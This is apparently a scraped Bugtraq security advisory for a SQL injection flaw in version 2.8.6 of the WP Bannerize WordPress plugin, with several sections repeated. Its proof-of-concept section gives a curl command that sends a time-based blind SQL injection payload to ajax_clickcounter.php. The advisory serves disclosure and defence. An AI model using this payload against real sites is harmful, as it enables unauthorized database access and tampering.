WordPress WP Bannerize 'ajax_clickcounter.php' SQL Injection Vulnerability
BID:49401
Info
WordPress WP Bannerize 'ajax_clickcounter.php' SQL Injection Vulnerability
| Bugtraq ID: | 49401 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 01 2011 12:00AM |
| Updated: | Sep 01 2011 12:00AM |
| Credit: | Miroslav Stampar |
| Vulnerable: |
WordPress WP Bannerize 2.8.6 |
| Not Vulnerable: | |
Discussion
WordPress WP Bannerize 'ajax_clickcounter.php' SQL Injection Vulnerability
The WP Bannerize plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WP Bannerize versions 2.8.6 and prior are vulnerable.
The WP Bannerize plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WP Bannerize versions 2.8.6 and prior are vulnerable.
Exploit / POC
WordPress WP Bannerize 'ajax_clickcounter.php' SQL Injection Vulnerability
The following example data is available:
curl --data "id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " -H "X-Requested-With:XMLHttpRequest" http://www.example.com/wp-content/plugins/wp-bannerize/ajax_clickcounter.php
The following example data is available:
curl --data "id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " -H "X-Requested-With:XMLHttpRequest" http://www.example.com/wp-content/plugins/wp-bannerize/ajax_clickcounter.php
Solution / Fix
WordPress WP Bannerize 'ajax_clickcounter.php' SQL Injection Vulnerability
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
References
WordPress WP Bannerize 'ajax_clickcounter.php' SQL Injection Vulnerability
References:
References:
- Plugin Homepage (WordPress)
- WordPress Homepage (WordPress)